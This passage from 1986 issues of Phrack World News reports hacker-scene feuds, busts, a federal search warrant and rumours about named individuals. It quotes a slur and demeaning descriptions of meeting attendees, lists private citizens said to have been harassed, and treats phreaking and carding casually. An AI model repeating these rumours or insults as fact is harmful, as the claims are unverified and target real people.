  1529. Access To Government Computers Clarified                           June 9, 1986
  1530. ----------------------------------------
  1531. Sen. Charles McC. Mathias (R- Md.) has introduced a bill in the U.S. Senate
  1532. that would amend Section 1030 of Title 18 of the United States Code with the
  1533. purpose of clarifying coverage with respect to access to computers operated for
  1534. or on behalf of the federal government.
  1535.  
  1536. The legislation would clearly impose penalties on anyone who modified,
  1537. destroyed or prevented use of information in a government computer system or
  1538. who used or disclosed individually identifiable information in such a computer.
  1539. The bill has been referred to the Senate Committee on The Judiciary.  No
  1540. subcommittee has yet been assigned.
  1541.  
  1542.                     Information Provided by Cathryn Conroy
  1543. _______________________________________________________________________________
  1544.  
  1545. Tap Interviews II...by Dead Lord                                  July 14, 1986
  1546. --------------------------------
  1547. The infamous Dead Lord is back and this time with an anonymous rag file that he
  1548. entitled Tap Interviews II to start people thinking that the Infiltrator had
  1549. written it.  Lets look at this file in parts.
  1550.  
  1551. First Dead Lord starts out by saying that he is Infiltrator and then changes
  1552. his mind and becomes Sharp Razor (who is supposedly in prison).  His first
  1553. interview was an imaginary exchange of words between him and Lex Luthor of the
  1554. Legion Of Doom.  The interview also was used to rag on Infiltrator by the way
  1555. it was presented.
  1556.  
  1557. Dead Lord then decided to interview Executive Hacker of Chief Executive
  1558. Officers (CEO).  The funny part about this interview is that Executive Hacker
  1559. is another handle used by Dead Lord.  The only rag mentioned was that Executive
  1560. Hacker didn't know that Ultima IV had been released and that there were only
  1561. two members in CEO.  Dead Lord then goes on to say, "LOD is a group of
  1562. egotistical fools..."
  1563.  
  1564. Then started the straight rags without the interview crap.  This is where ole
  1565. Dead Lord gives his opinion on eFerything.  For the first few paragraphs he
  1566. rags on The Doctor, SpecElite, pirates in general, Monty Python, and The Flying
  1567. Circus BBS.
  1568.  
  1569. Then he starts giving descriptions of the people who attend the weekly TAP
  1570. meetings:
  1571.  
  1572.   "Cheshire is a tired old man, Broadway Hacker, who is an obnoxious slob
  1573.    anyway, stopped going, the "950 codes kids" Ninja NYC and his pals have
  1574.    mostly moved on, though Ninja NYC still attends.  Ninja NYC is, at 17 years
  1575.    old, a complete criminal, the guy has stolen everything you can think of..."
  1576.  
  1577.   "Two Sigmund Frauds also attend (they are partners) one is a skinny asshole
  1578.    who has an earing and the other I never spoke to, but he is he one who
  1579.    supposedly does all the BBS calling.  There is also some friend of Ninja's
  1580.    who works for Northern Telcom."
  1581.  
  1582.   "There is some young guy with a French accent who always smiles, and some
  1583.    middle aged fag who is always talking.  Then there is MARK!  Ye Mark, though
  1584.    he tries to be friendly, people try to stay away.  He works at a Camera..."
  1585.    "He is slightly (very) unbalanced mentally, and always very confused.  He is
  1586.    teased constantly but tolerated."
  1587.  
  1588.   "There are also a few less important people, such as "Sid" some greasy kid
  1589.    who is proud to have had a $1700+ fone bill because he thought he was using
  1590.    a diverter.  Right now, they are generally a motley bunch.  Also they get
  1591.    kicked out of restaurants frequently now, and are down to meeting at Burger
  1592.    King.  <SIGH>  How pitiful..."
  1593.  
  1594. After all of the above bullshit, he talks about Lord Digital, his "cult," and
  1595. his adventures with Paul Muad'Dib.  Dead Lord still had more to say though, he
  1596. decided to bring up Monty Python again as well as Phrack, TWCB, Stronghold
  1597. East, Private Sector, and 2600 Magazine.  All of what he had to say was
  1598. completely bogus and Dead Lord claimed to be a member of Metal Shop Private,
  1599. although he called it Metal Shop Elite, which is untrue.  Fact is he was never
  1600. a member, not even on the old MSP.  He also claims that he has submitted
  1601. articles for Phrack, but was turned down because they were original files. Best
  1602. bet is that whatever he was writing, he didn't know what he was talking about.
  1603.  
  1604. Some notes to Dead Lord, as far as why Taran King was in the hospital; First
  1605. off it was a psychiatric ward not a "hospital".  Second, why don't you go and
  1606. read PWN 5-1 for the real story of what happened.  Third, the cosysop of
  1607. Stronghold East is not the Slayer, it is Slave Driver.
  1608.  
  1609. The truth is that both MSP and SE refused to let Dead Lord on and he holds a
  1610. grudge.  He then went on to say that both 2600 Magazine and Private Sector
  1611. sucked and that they always have.  Of course I am sure that Dead Lord could
  1612. easily put out a better magazine then either/or 2600 and Phrack Inc., and he of
  1613. course has shown that he can run a better BBS than Private Sector or Metal Shop
  1614. Private.  He ragged on several other bulletin boards such as Inner View and
  1615. Speed Demon Elite.
  1616.  
  1617. After all of that he comes back to the subject of Legion of Doom, starts on
  1618. Tribunal of Knowledge, and the says why Chief Executive Officers is better.
  1619.  
  1620.   "LOD's main claim to fame is that Lex Luthor types up shitloads of manuals
  1621.    and plasters LOD all over them.  Getting published in 2600 every other month
  1622.    probably helps also."
  1623.  
  1624.   "Another emerging group CEO, isn't as ridiculous as LOD, I mean the members
  1625.    [all two of them] know a lot, and write intelligent stuff..."
  1626.  
  1627.   "Executive Hacker and Corporate Criminal, not much of a group even if these 2
  1628.    do stack up better than the entire LOD."
  1629.  
  1630. His last rags were on Adventurer's Tavern and Disk Rigger.
  1631. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1632. Most of you by now are probably wondering how we tracked him down.  Well for
  1633. starters Dead Lord made it a lot easier on us by deciding to mention that he
  1634. lived in NYC.  He also talked a lot about others in the NYC area.  Dead Lord is
  1635. a member of Draco Tavern.  Dead Lord was refused access to Metal Shop Private
  1636. and Stronghold East.  Dead Lord's file was refused for Phrack Inc.  The
  1637. clincher however was in finding that Dead Lord was actually Executive Hacker,
  1638. and I'm sure that many of you noticed that CEO, the group the Executive Hacker
  1639. belongs to, was highlighted and not ragged on.
  1640.  
  1641. Some other interesting things about Dead Lord include that fact that he started
  1642. a rumor in New York City, that Taran King had appeared on a talk show dealing
  1643. with hackers and the he is responsible for giving out Sigmund Fraud's and Ninja
  1644. NYC's numbers to Daniel Zigmond and he probably has given him other numbers as
  1645. well.
  1646.  
  1647. It has been said that Dead Lord's phone number has been disconnected by outside
  1648. sources several times in the past and that the entire TAP Meeting attendees
  1649. group is out to cause him major physical damage.
  1650. _______________________________________________________________________________
  1651.  
  1652. Quicknotes
  1653. ----------
  1654. MOB RULES was indited on five counts of wire fraud by the secret service, the
  1655. charges dated back to 1984.  This is supposedly part of the reason that the
  1656. Marauder took down Twilight Zone, but this is pure rumor.
  1657. -------------------------------------------------------------------------------
  1658. More talk about Broadway Hacker being a REAL fed or fed informant has sprung
  1659. up.  We at PWN are looking for factual evidence that this is true.
  1660. -------------------------------------------------------------------------------
  1661. Night Stalker, sysop of the Underground, was busted for something dealing with
  1662. Transference of Funds.  It is unknown as to if Dan Pasquale had anything to do
  1663. with this bust.  Credit Card numbers were frequently found here as well.  His
  1664. phone line is being tapped and he cannot really discuss his bust to much.  He
  1665. is also under constant surveillance wherever he goes.  Look for a full story
  1666. in Phrack World News VII.
  1667. -------------------------------------------------------------------------------
  1668. The rumor that Carrier Culprit was busted is untrue, but he did receive a call
  1669. from AT&T Security, regarding Alliance Teleconferencing Services.
  1670. _______________________________________________________________________________
  1671. 
  1672.  
  1673.  
  1674.  
  1675.  
  1676. =========================================================================
  1677.  
  1678.                                 ==Phrack Inc.==
  1679.  
  1680.                      Volume One, Issue 7, Phile 10 of 10
  1681.  
  1682. PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  1683. PWN                                                                         PWN
  1684. PWN                      *^=-> Phrack World News <-=^*                      PWN
  1685. PWN                                                                         PWN
  1686. PWN                             Issue VI/Part 3                             PWN
  1687. PWN                                                                         PWN
  1688. PWN                         Compiled and Written by                         PWN
  1689. PWN                                                                         PWN
  1690. PWN                            Knight Lightning                             PWN
  1691. PWN                                                                         PWN
  1692. PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  1693.  
  1694. HoloPhax Phreaker Vs. USA                                         July 16, 1986
  1695. -------------------------
  1696. The following is a segment taken out of the summons served to HoloPhax Phreaker
  1697. on the above date.  The actual summons was over 10 pages long and was mostly
  1698. depositions from witnesses and/or other testimonies that incriminate HoloPhax
  1699. Phreaker.  I am of course substituting HoloPhax Phreaker for his real name.
  1700. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -- - - -
  1701.   The United States of America and the State of Florida Vs. HoloPhax Phreaker
  1702.  
  1703. U.S. and Florida Citizen HoloPhax Phreaker, is believed and under suspicion of
  1704. such to have violated the following state and federal laws:
  1705.  
  1706.    U.S. Copyright Laws
  1707.    U.S. Telephone Infringement Act
  1708.    Florida State Telephone Harassment Laws
  1709.  
  1710. Reported a false emergency to or harassing the following
  1711. STATE bureaus:
  1712.  
  1713.    Seminole County Police Department
  1714.    Seminole County Fire Department
  1715.    Orange County Emergency Line (911)
  1716.    Orange County Police Department
  1717.    Orange County Fire Department
  1718.    Orange County Bomb Squad
  1719.    Orange County Special Weapons Attack Team (S.W.A.T.)
  1720.  
  1721. and the following FEDERAL bureaus:
  1722.  
  1723.    Federal Bureau of Investigation (F.B.I.), Tampa office
  1724.    Federal Bureau of Investigation (F.B.I.), Orlando office
  1725.    United States Secret Service, Orlando office
  1726.    National Security Agency, Washington D.C. office
  1727.    Central Intelligence Agency (C.I.A.), Washington D.C. office
  1728.    Internal Revenue Service (I.R.S.), Tallahassee office
  1729.    United States Marine Patrol, Titusville office
  1730.  
  1731. and to have harassed the following private citizens or companies:
  1732.  
  1733.           John F. Sheehan          Bob Driscol          Erwin V. Cohen
  1734.           Phillip Minkov           Margaret Branch      Harley Pritchard
  1735.           Gladys Smith             Kathleen Gallop      Frank Yarish
  1736.           Aida Smith               Ron L. Ebbing        Pat C. McCoy
  1737.           Kent Schlictemier        Doyle E. Bennet      Arthur Meyer
  1738.  
  1739. Rape Crisis Center
  1740. Poison Control
  1741. Spouse Abuse
  1742. Koala Treatment Center
  1743. Chemical Dependency Unit
  1744. Florida Hospital Center for Psychiatry
  1745. Orlando General Hospital; Alcohol and Chemical Dependency Unit
  1746. Cocaine Hot Line
  1747.  
  1748. U.S. and Florida Citizen HoloPhax Phreaker is also believed and suspected of
  1749. the following felonies and/or misdemeanors:
  1750.  
  1751. Illegal manipulation of telephone company controlled conversations and devices
  1752. Fraudulent Use of a Credit Card (i.e.: Carding)
  1753. Grand Theft
  1754. Possession of Stolen Property
  1755. Defrauding the Telephone Company (i.e.: Phreaking)
  1756. Illegal Entry (i.e.: Hacking)
  1757. Annoying or Harassing calls
  1758. Theft
  1759. Breaking and Entering
  1760. Assault and Battery
  1761. Harassment of a Government Emergency line
  1762. Threats to the life of the President of the United States of America
  1763. Possible Treason to the United States of America
  1764. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1765. Well, wasn't that nice, especially the parts about *treason* and threats to the
  1766. life of the President of The United States of America.  HoloPhax Phreaker
  1767. claims that the majority of the crimes, including all of the harassment
  1768. charges, were committed on an Alliance Teleconference that he was NOT in
  1769. control of and as such had no control over what/who was called and what hap
  1770. pened.  One example of this has to do with threatening the life of the
  1771. President, HoloPhax says that this was done on a confer ence with the U.S.
  1772. Secret Service.
  1773.  
  1774. It all started with a phone call at about 12:30 PM on July 16, 1986.  The call
  1775. was placed from a CB (Citizen's Band) radio in a car.  They unknown caller told
  1776. HoloPhax that the police were on their way to search his house and would be
  1777. there in 15 minutes.  The caller also said that the law enforcement officials
  1778. had a warrant to search HoloPhax's property, however they did not specify as to
  1779. what was to be looked for.  HoloPhax grabbed everything he could and buried it
  1780. all in his backyard.
  1781.  
  1782. Sure enough, within 15 minutes his *expected* guests arrived.  One cruiser and
  1783. four unmarked vehicles pulled up blocking his and the neighbor's driveways.
  1784. About sixteen people came to the door and HoloPhax let them in, after all they
  1785. did have a warrant.  Several of them pushed HoloPhax aside and then the search
  1786. started on the first floor.  While some searched through the sofa, other
  1787. furniture, and drawers, a couple of them flashed the warrant as well as their
  1788. identification, U.S. Secret Service and National Security Agency.
  1789.  
  1790. They then went up to HoloPhax's room and immediately check his phone's,
  1791. computer's, and television's serial numbers.  They also took around 30 pictures
  1792. of things in his room.  They then searched through stacks of worthless
  1793. printouts and confiscated several dozen of his disks that contained pirated
  1794. terminal programs, utilities, text files, and games.
  1795.  
  1796. When they couldn't find any hack/phreak material or a modem, they became angry
  1797. and started ripping the sheets off the beds, pulling up the carpet from the
  1798. floor, and knocking on the walls.  While most of them were doing this, another
  1799. agent handed HoloPhax a paper that stated exactly what they were looking for.
  1800.  
  1801. He told HoloPhax that since they had not found anything on the list, they could
  1802. only leave with what little they had and could NOT take HoloPhax into custody.
  1803. They searched a couple of other rooms, but not as thorough as they had searched
  1804. HoloPhax's room.  They had taken books off the shelves and flipped through
  1805. their pages, looked inside pillow cases and under some loose boards in the
  1806. floor.  After 1- 1 1/2 hours they finally left and said that HoloPhax would be
  1807. contacted very soon for a hearing date.
  1808.  
  1809. One of the more interesting members of the search team was Richard Proctor
  1810. (See PWN 5-5 for more information on Richard Proctor).
  1811.  
  1812. He wore little round glasses that were tinted so you couldn't see his eyes. He
  1813. had long brown hair (longer than a business person should...) and was wearing a
  1814. suit.  He had fair skin, but he wasn't really tan.  He looked like a mix of a
  1815. dude out of Woodstock and someone from IBM management.  He didn't say much, and
  1816. only spoke directly to HoloPhax once.  He asked,"Where the fuck are you hiding
  1817. the codes!?"  HoloPhax responded with, "Go fuck your sister!"  This really
  1818. pissed Proctor off.  Proctor then proceeded to tearing up his room pretty bad.
  1819. He seemed to know as much about HoloPhax as the NSA and SS guys did (but then
  1820. he was probably briefed ahead of time).
  1821.  
  1822. There was also a representative from the local sheriff's department as well as
  1823. one from the F.B.I.  They asked HoloPhax several questions , most of them were
  1824. directed to a "mafia" type group called PHBI that is semi-local to HoloPhax's
  1825. area.
  1826.  
  1827. They seemed to want to connect HoloPhax to many "hits" PHBI had done on people,
  1828. businesses, and the government.  They did not make clear what it was they were
  1829. trying to say HoloPhax did, but they sure did try many ways of tricking him
  1830. into admitting that he was a member of this group or some other phreak or
  1831. anarchist league.
  1832.  
  1833. Ok, now going back to the summons, it was about ten pages long and most of it
  1834. was printouts of accounts on bulletin boards and interviews with people that
  1835. knew something of HoloPhax's activities or activities of close aquaintences.
  1836.  
  1837. The Infiltrator and HoloPhax used to go to the same school in 10th grade and in
  1838. the summons there was an interview with the police officer of that school that
  1839. mentioned some of the "jobs" that "they" had pulled there and never got caught
  1840. for.  Infiltrator was also mentioned in a note by some guy that was named John
  1841. Sheehan who had been harassed by phone/credit for 1 1/2 years.  He said that
  1842. HoloPhax and Infiltrator were responsible for the 140 hours of tape he had.
  1843. Infiltrator was also mentioned in several BBS printouts.
  1844.  
  1845. The law enforcement officials did acquire several of the older issues of Phrack
  1846. Inc. Newsletter and they kept trying to make HoloPhax admit to writing files on
  1847. credit fraud, phreaking, or hacking.  Specifically, as far as hacking, were
  1848. files on MILInet and ARPAnet.
  1849.  
  1850. The handle they were looking for was Agent Orange, which HoloPhax had gone by
  1851. for 6 years.  He changed his handle to HoloPhax after an incident that took
  1852. place roughly a year ago when HoloPhax was busted for hacking Compuserve and
  1853. N.A.S.A. accounts.  Law enforcement officers had also tried to get him for
  1854. phreaking, but that attempt failed.
  1855.  
  1856. As far as the mysterious phone call before the bust, HoloPhax thinks that maybe
  1857. the PHBI got wind of what was going down and warned him.  How or why he doesn't
  1858. know.  It is really unknown as to why he is suspected of being a member of this
  1859. group.
  1860.  
  1861. HoloPhax admits a guilty plea for the charges of Illegal Entry (Hacking),
  1862. Defrauding the phone company (Phreaking), a little harassment, and possession
  1863. of stolen property.  He pleas innocent to the rest of the charges.
  1864.  
  1865. HoloPhax's last statement was that he will be back into hack/phreaking in the
  1866. near (maybe distant if convicted) future.  He is always available for
  1867. conferences if you have questions.
  1868.  
  1869.                    Information Provided by HoloPhax Phreaker
  1870.                     through interview with Knight Lightning
  1871. _______________________________________________________________________________
  1872.  
  1873. Lightman's Stories...Hoax or Fact?                                July 20, 1986
  1874. ----------------------------------
  1875. Many of you should remember last issue's article about David Lightman and Blade
  1876. Runner.  After that article was printed, many other points of view were brought
  1877. up.  The following does not necessarily represent the views of Phrack, Phrack
  1878. World News, or myself.
  1879. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1880. According to Ryche, a phreak in the 214 NPA, David Lightman doesn't like Blade
  1881. Runner because of both the P.H.I.R.M. and Worlds Grave Elite kicking him out as
  1882. Co-Sysop of that board.
  1883.  
  1884. This of course made David Lightman very angry and he decided to change Blade
  1885. Runner's phone number.  This of course made Blade Runner very angry as well and
  1886. since he is over 18 years of age, he decided to call David's father and let him
  1887. know what his son has been up to.  Supposedly father and son had a long talk
  1888. and David lost his modem privileges for a while.
  1889.  
  1890. Ryche also cleared up the rumor about Blade Runner working for Southwestern
  1891. Bell Security.  David Lightman, using Credimatic, performed a credit check on a
  1892. name that he thought was Blade Runner's, but was in reality a relative of Blade
  1893. Runner.  Anyway what David found was that this person worked for ITT.  Now as
  1894. many of you should know, ITT has many subsidiaries that are non-Telcom related.
  1895. Nevertheless, David interpreted this guy as being Blade Runner and then for
  1896. unknown reasons started telling people that Blade worked for Southwestern Bell
  1897. Security.
  1898. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1899. That was all Ryche had to say about the Lightman/Runner Controversy.  This is
  1900. what he says about David Lightman's "so-called" involvement with Captain
  1901. Midnight and the Administration Voice Mailbox.
  1902.  
  1903. When Lightman started his Administration Mailbox, several of the local rodents
  1904. decided to inform the FBI that Lightman was providing a way to defraud the
  1905. phone company in the mailbox service.  From then on, the FBI must have been
  1906. monitoring the mailbox themselves and when David told everyone that Captain
  1907. Midnight could receive messages there and that he called every week, this must
  1908. have made things very interesting.
  1909.  
  1910. Ryche also added," Dave set out to make everyone think he knew Captain Midnight
  1911. and he could reach him. He has also, in the past on phone conversations, said
  1912. that Captain Midnight was on Administration Board 1 or some Administration
  1913. board.  He has also told me and a few others that he was in the Legion Of
  1914. Doom."
  1915.                          Information Provided By Ryche
  1916. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1917. Almost all of the above article was from posts on the Phrack board on Metal
  1918. Shop Private.  David Lightman said that all of what Ryche says is lies, but
  1919. that he was sick of discussing it and did not want to bring it up again.
  1920. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1921. July 23, 1986
  1922.  
  1923. One Wednesday, July 23, 1986 a new message appeared on David Lightman's Voice
  1924. Mailbox that said something like this, 'Attention, please listen! From this day
  1925. forward, I will no longer be calling any BBSes.  I have run into trouble and I
  1926. cannot discuss it over the phone line.  Telecom College and the Secret Passage
  1927. on Castle Alcazar will be turned over to Radar Detr.  Any associates of mine
  1928. are warned to be very careful.  Any sysop whose BBS I was on is asked to delete
  1929. my account.  Again, I can not discuss this over the phone line.  It has really
  1930. been a blast knowing all of you guys over the past 4 years.  I have discovered
  1931. that no one is immune to getting caught.  I have also found out [studder
  1932. studder] that it [hacking/phreaking] is not worth the price you pay once you
  1933. are caught.  Please give this news to Knight Lightning and have him put it in
  1934. Phrack World News.  That is the best way I know of to warn my associates.
  1935. Again I cannot discuss this over the phone line, please do not call back.
  1936. That's about it, bye.'
  1937.  
  1938. Please note that the above is not Lightman's exact words, but it is the general
  1939. idea of what Lightman said.  Also, on the same day, Sticky Fingers a 214 NPA
  1940. phreak got a similar message on his voice mailbox.
  1941.  
  1942. On Wednesday evening at about 6:30 p.m. Mr. BiG, sysop of Phantasm Elite,
  1943. received a call from David Lightman (or rather someone using DL's password).
  1944. Lightman didn't post on this call which is unusual because Lightman always
  1945. posts when he calls.  David Lightman logged off at about 6:45 PM.  So if this
  1946. really was Lightman and he just didn't post then that places his "trouble" or
  1947. bust somewhere between 6:45 PM and 10:30 PM (When I called his mailbox).
  1948. Question:  Who gets busted in the evening?
  1949.  
  1950. The next day, July 24, Mark Time logged on to Castle Alcazar and saw that
  1951. Lightman was the last caller.  Again there were no new posts by David Lightman
  1952. on the board.  So, if Lightman was busted then the law enforcement agencies do
  1953. indeed have his BBS and password files.  The only other possibility is that
  1954. Lightman was not busted and that this is all a hoax performed for unknown
  1955. reasons.
  1956.  
  1957. On the same day, Ryche called Lightman to ask what the deal was.  He refused to
  1958. talk about it over the phone.  However, they did set a time that Lightman would
  1959. call him from a pay phone to discuss it.  Later, Lightman called Ryche back and
  1960. told him that he would not discuss the bust until "a few more things were
  1961. cleared up."
  1962.  
  1963. That evening, I learned from The Safe Cracker that David Lightman was not
  1964. actually busted and that he had received a call from AT&T Security about Blue
  1965. Boxing.  This could mean that they knew he boxed [however he lives in an ESS
  1966. area] or that he was on a boxed Alliance Teleconference.  Either way it matters
  1967. little.  Now nobody can get in touch with him and the message on his mailbox
  1968. has changed.
  1969.  
  1970.                 Information Provided By Sticky Fingers & Ryche
  1971. _______________________________________________________________________________
  1972. 
  1973.  
  1974.  
  1975.  
  1976.